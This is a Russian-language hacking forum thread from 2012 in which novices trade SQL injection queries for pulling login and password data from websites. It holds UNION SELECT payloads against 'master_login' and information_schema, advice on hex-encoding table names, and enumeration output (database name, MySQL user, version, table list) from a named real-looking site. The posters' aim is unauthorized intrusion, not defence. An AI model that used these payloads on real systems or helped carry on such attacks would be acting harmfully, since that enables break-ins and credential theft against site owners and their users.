 |
|
04.05.2012, 01:00
|
|
Новичок
Регистрация: 16.03.2010
Сообщений: 28
С нами:
8503122
Репутация:
0
|
|
Цитата:
Сообщение от D@Gshram
помогите кто-нибудь раскрутить sql. дам 150руб кто объяснит последние три шага +лог.пароль. BL 17
это говорит, что Вы нихера ничего не читали, а тока ждете когда за вас все сделают...
Ваши 150р. никому не нужны, уже наверно и базу слили и пароль админа получил)
|
|
|
16.05.2012, 01:00
|
|
Участник форума
Регистрация: 23.07.2010
Сообщений: 138
С нами:
8318486
Репутация:
-24
|
|
Здравствуйте, нашел скуль на одном сайте, выполнил все действия и перешел уже почти казалось к выводу данных из колонки login,pass и тут такая хрень,
код который использовал.
source:
Код:
site.com/news.php?
id
=-14+UNION+SELECT+1,group_concat(
id
,0x3b,login,0x3b,pass),3,4,5,6,7,8+from+master_login
Вывода на экран не было. только, ошибка вылетела
code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/u0786019/data/www/site.com/news.php on line 122
и вместо данных получил.
{TOPTITLE} |
|
|
|
16.05.2012, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
Попробуй master_login в SQL-Hex закатать.
|
|
|
|
20.07.2012, 01:00
|
|
Новичок
Регистрация: 26.07.2012
Сообщений: 0
С нами:
7261526
Репутация:
0
|
|
Подниму тему, так как возник вопрос.
Не могу определить наименование колонок одной из таблиц.
Ввожу site.com/index.php?action=price&id=-1+UNION+SELECT+1,2,3,4,group_concat(column_name),6 ,7,8,9,10,11+from+information_schema.columns+where +table_name= 0x61646d696e--
И ничего не происходит. И объясните пожалуйста, что это такое: 0x61646d696e?
Как мне правильно сделать запрос, чтобы получить информацию?
|
|
|
|
21.07.2012, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
0x61646d696e это sql-hex. 0x просто указывает sql, что следом идёт heх строка. В данном случае там должно быть имя таблицы, колонки которой ты пытаешься узнать.
|
|
|
|
21.07.2012, 01:00
|
|
Новичок
Регистрация: 26.07.2012
Сообщений: 0
С нами:
7261526
Репутация:
0
|
|
Цитата:
Сообщение от M@ZAX@KEP
0x61646d696e это sql-hex. 0x просто указывает sql, что следом идёт heх строка. В данном случае там должно быть имя таблицы, колонки которой ты пытаешься узнать.
Всё равно не получается узнать колонки, просто ошибку выдаёт и всё. Почему так происходит?
|
|
|
|
22.07.2012, 01:00
|
|
Новичок
Регистрация: 26.07.2012
Сообщений: 0
С нами:
7261526
Репутация:
0
|
|
Вот тот самый сайт: http://www.climatelab.ru/index.php?action=price&pid=2
Вот данные которые я уже вытянул:
Цитата:
Появившеяся цифра: 5
Текущая БД: climatea_clim
Текущий пользователь MySQL: climatea_clim@localhost
Версия MySQL: 5.1.63-cll
Таблицы:
CHARACTER_SETS
CLIENT_STATISTICS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
INDEX_STATISTICS
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TABLE_STATISTICS
THREAD_STATISTICS
TRIGGERS
USER_PRIVILEGES
USER_STATISTICS
VIEWS
climat_aqua
climat_aqua_prod
climat_catalog
climat_catalog_prod
climat_climat
climat_condit
climat_condit_prod
climat_config
climat_count
climat_news
climat_pages
climat_split |
|
|
|
22.07.2012, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
Ты хочешь чтобы за тебя раскрутили или хочешь понять, в чём твоя ошибка и почему мускуль выдаёт error? Тогда тащи саму ошибку и запрос, с которым её получил.
|
|
|
|
22.07.2012, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
Экстрасенсов нет. Тащи ошибку.
|
|
|
|
23.07.2012, 01:00
|
|
Новичок
Регистрация: 26.07.2012
Сообщений: 0
С нами:
7261526
Репутация:
0
|
|
Цитата:
Сообщение от M@ZAX@KEP
Ты хочешь чтобы за тебя раскрутили или хочешь понять, в чём твоя ошибка и почему мускуль выдаёт error?
Я хочу понять в чём моя ошибка. Мне бы расписать что я делаю не так и показать пример, как нужно делать правильно, раскручивать за меня я не прошу.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
